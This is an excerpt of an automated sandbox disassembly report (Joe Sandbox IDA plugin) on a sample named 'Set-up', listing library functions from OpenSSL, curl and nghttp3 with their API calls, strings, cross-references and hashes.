API String ID: 39653677-4294831502
Opcode ID: f3d6f87a1f790ff4be9ece4ae1b23ad3b24469129c326c8e8a08ffaa6ecf39a1
Instruction ID: d6515812add0ca8cfd5560216f722330fb4beccba5243068021b735f11ae3d75
Opcode Fuzzy Hash: f3d6f87a1f790ff4be9ece4ae1b23ad3b24469129c326c8e8a08ffaa6ecf39a1
Instruction Fuzzy Hash: 5221C8F2A04315BBDA106E55AC42D6B77ECEDA1394F0A4439FD4C86242F771CD29C6A3

Function 00262240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0025F763,?,?,?,?,?), ref: 00262251
WideCharToMultiByte.KERNEL32 ref: 00262284
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 002622BD

Strings

engines/e_capi.c, xrefs: 00262299, 002622D0, 00262342
ERR_CAPI_error, xrefs: 0026231A
engines/e_capi_err.c, xrefs: 00262321

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$wcslen
String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
API String ID: 1062461220-336193293
Opcode ID: f8184d7ec973aa177c5dbdec39d2bad04958a1460b5ee34f3d67836000f68ef6
Instruction ID: 74a63547b3a830a2fef65101e2801859771774740669e42d3d6da987da3820ab
Opcode Fuzzy Hash: f8184d7ec973aa177c5dbdec39d2bad04958a1460b5ee34f3d67836000f68ef6
Instruction Fuzzy Hash: 6521F7B1E54705AAF3302B61AC46B3B36599B50714F054179F908563C2EBF849A8C7D2

Function 001D81F0 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 198stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,0017A9CE,000000D2), ref: 001D83A3
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0017A9CE), ref: 001D83C6

Part of subcall function 001D60E0: GetLastError.KERNEL32(001D7CCC,?,00000000,001D7127,001D7CCC,00000000,001FCAB7,00021A70), ref: 001D60E3
Part of subcall function 001D60E0: SetLastError.KERNEL32(00000000), ref: 001D61A5

Strings

crypto/err/err_local.h, xrefs: 001D8311, 001D8332, 001D8385, 001D83E8, 001D84BB

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ErrorLast$strcpystrlen
String ID: crypto/err/err_local.h
API String ID: 542397150-344804083
Opcode ID: c19bdd41e9e0c656109602275f9d9a044de7fe26b3eecfc4e1bd2a0e6c61e063
Instruction ID: 41cc8ee4c2b3635957c943a763193a4b76e1a86ee26bb5012166a22366d25c9f
Opcode Fuzzy Hash: c19bdd41e9e0c656109602275f9d9a044de7fe26b3eecfc4e1bd2a0e6c61e063
Instruction Fuzzy Hash: BE8182B1500B05AFE3239F28E885BE2B7E0FB5030CF444E19E6D9873A5DB79A524CB51

Function 00026730 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 179stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000273F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0002CA95,0059DE58,00000467,mprintf.c), ref: 0002741D
Part of subcall function 000273F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00027445

Part of subcall function 000647D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 000647FB
Part of subcall function 000647D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0006480C
Part of subcall function 000647D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00064837

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00026844
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00026876
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 000268FD

Strings

hsts.c, xrefs: 00026748, 0002675D, 00026777, 0002691D, 0002694E, 0002696F
unlimited, xrefs: 0002686C
%256s "%64[^"]", xrefs: 00026857

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$feoffgetsmemcmpmemcpy
String ID: %256s "%64[^"]"$hsts.c$unlimited
API String ID: 288886899-2895786126
Opcode ID: ef2f7653c5b998d75698ba903ea8df76a7c37d533c26725cf53e5b0e71f961f2
Instruction ID: f1e8a5bb5f07859e74a7170789e1b7f07cef80b8f3fc5c0412225f3cfab22304
Opcode Fuzzy Hash: ef2f7653c5b998d75698ba903ea8df76a7c37d533c26725cf53e5b0e71f961f2
Instruction Fuzzy Hash: F7514D71E483617BDB209B20BC42E6B7AD9AF55704F144928FC48962C3FE32DA14C793

Function 00218240 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00219265,?,00000400,00000000,?), ref: 00218254
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00219265,?), ref: 00218264
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00219265,?,?,?,?,?,?,00219265,?,00000400,00000000,?), ref: 002182C7

Strings

crypto/pem/pem_lib.c, xrefs: 002182A8
Enter PEM pass phrase:, xrefs: 00218279, 0021828C
PEM_def_callback, xrefs: 002182A1

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
API String ID: 160209724-3271887637
Opcode ID: bc30b3502cbe2e7c83dc0af40af474a7fd03452f0fb1176eba9307391726e537
Instruction ID: ba9ba3c565108c9d3e60c76c2cf3d1df550422335dffc70a81d63fc393c84ffb
Opcode Fuzzy Hash: bc30b3502cbe2e7c83dc0af40af474a7fd03452f0fb1176eba9307391726e537
Instruction Fuzzy Hash: B201F9A2B0031177E211AA647CC3F6F268DCB92750F040536FE04962C2FB519C1551F2

Function 000845C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 259COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00055B6B,00000017,?,?), ref: 00084612
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00084660

Strings

0123456789abcdef, xrefs: 0008465B, 0008466C
0123456789ABCDEF, xrefs: 00084683, 00084694

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _errnomemchr
String ID: 0123456789ABCDEF$0123456789abcdef
API String ID: 4119152314-885041942
Opcode ID: 0ee84ea6770a9d3539c1ae7902b96c6f9adb800335bdbca5c8b8c17b9f22f9b6
Instruction ID: 943c8b83cc8a5dd47dd37d258aa846330682ee78f05f24454c623de69c47bea6
Opcode Fuzzy Hash: 0ee84ea6770a9d3539c1ae7902b96c6f9adb800335bdbca5c8b8c17b9f22f9b6
Instruction Fuzzy Hash: 5091D375A0C3528BD728EE28C85027EB7D2FFD6314F198A2DE8D587381EB759D848742

Function 00072250 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0007225F
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000722CF

Strings

Hostname in DNS cache was stale, zapped, xrefs: 00072322
:%u, xrefs: 00072290, 00072363
Hostname in DNS cache does not have needed family, zapped, xrefs: 000723EF, 000723FE

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
API String ID: 3014104814-1335658360
Opcode ID: e828b399bf2dc24a232baaff93fa0d84b1274f55657d9416a8a881ff7cf378d4
Instruction ID: 571b42c369fecedb9336e63f69a647f0add497b1b3f0adee0c60217aa2e35ab5
Opcode Fuzzy Hash: e828b399bf2dc24a232baaff93fa0d84b1274f55657d9416a8a881ff7cf378d4
Instruction Fuzzy Hash: EE410571E003045BD7649A24DC85BBBB7D5EF84314F08C43CEA9E8B283E639ED558795

Function 000D06F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,000D0307,?), ref: 000D07AE
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000D07C3

Strings

nghttp3_qpack.c, xrefs: 000D07A4, 000D07B9
ctx->next_absidx > absidx, xrefs: 000D07A9
ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 000D07BE

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
API String ID: 1222420520-241347991
Opcode ID: 230a523dac27180e15b243187a694afaf8ef6add0bd3a088d3652075a1aee32a
Instruction ID: 7f5f53677349eb90c697ddcebdbe36d6899711a7de61cb77ce66e731ac4c46e9
Opcode Fuzzy Hash: 230a523dac27180e15b243187a694afaf8ef6add0bd3a088d3652075a1aee32a
Instruction Fuzzy Hash: BC31C475B00704ABD310AB28DC81F6F73A9BF89714F04853CF48987342EA21F85187A5

Function 003A4610 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00035FB6,?), ref: 003A4645
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 003A4698
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,006A5618), ref: 003A4744
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 003A4762

Strings

../list/public_suffix_list.dat, xrefs: 003A4693, 003A46B9, 003A46F5

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _stat64$fclosefopen
String ID: ../list/public_suffix_list.dat
API String ID: 1085753941-141370353
Opcode ID: 476cc60ee2cbc7f31baf190724b278dc35993e1046d3059e2f817bb455a77487
Instruction ID: 8f52bfeb6c43eb75483380c75054582266f5613827469b94e45cdf834f557d6a
Opcode Fuzzy Hash: 476cc60ee2cbc7f31baf190724b278dc35993e1046d3059e2f817bb455a77487
Instruction Fuzzy Hash: 6C41AFB2A083419BC701DF18D58076AB7EAEBC7754F16482CE8D5DB250E7B1ED48CB92

Function 00092680 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00092771

Strings

set timeouts for state %d; Total % lld, retry %d maxtry %d, xrefs: 00092761
netascii, xrefs: 00092680
Connection time-out, xrefs: 000926CD
gfff, xrefs: 000926EE

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _time64
String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
API String ID: 1670930206-2395985473
Opcode ID: 5c675fed17aae6b355d5c48d82fc88f33853ae5138fafce80bd16e7466239c0c
Instruction ID: 0f81db0f631ddcf2c92021c1433d0d5782b660f59e33f456995253d140f42658
Opcode Fuzzy Hash: 5c675fed17aae6b355d5c48d82fc88f33853ae5138fafce80bd16e7466239c0c
Instruction Fuzzy Hash: 60214CB1B003002FEB289A29EC06F2779DAEBC0304F18893DF94ACB282F571D8009651

Function 000C6010 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 000C6119
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 000C612E

Strings

0 == offset, xrefs: 000C6129
nghttp3_stream.c, xrefs: 000C610F, 000C6124
veccnt > 0, xrefs: 000C6114

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
API String ID: 1222420520-3888743547
Opcode ID: 194319155555d8b6ca1f7f3c512a4bf0118b80897695ee4b7aa02e3979f758be
Instruction ID: af198cb78e8ced20b46c690274edf779590b240ee237767b1564e9cec5567d60
Opcode Fuzzy Hash: 194319155555d8b6ca1f7f3c512a4bf0118b80897695ee4b7aa02e3979f758be
Instruction Fuzzy Hash: 4D31E2715042048FC714EF54D885FABB7E5FF88318F1585BCE98A6B252E632AD41CB91

Function 000C87E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,000C4D5A,00000000,?,000001F0), ref: 000C8861
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 000C8873

Strings

n <= balloc->blklen, xrefs: 000C885C
((uintptr_t)balloc->buf.last & 0xfu) == 0, xrefs: 000C886E
nghttp3_balloc.c, xrefs: 000C8857, 000C8869

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$n <= balloc->blklen$nghttp3_balloc.c
API String ID: 1222420520-3025919285
Opcode ID: a3f6f895e7840402dd76e24c78bc9b5a5816b40ee75a862e5f21a4945ce97fe4
Instruction ID: 2e9678e2b3ac8c64eb839f70c9fe5b873668027412f24e6f266e9ff2ee8bed79
Opcode Fuzzy Hash: a3f6f895e7840402dd76e24c78bc9b5a5816b40ee75a862e5f21a4945ce97fe4
Instruction Fuzzy Hash: 9C11CCB6A40711ABD7008F64EC46E99B775FF41721B088628F414977D2DB30F864C7E4

Function 00024810 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 484COMMON

Download Yara Rule

Strings

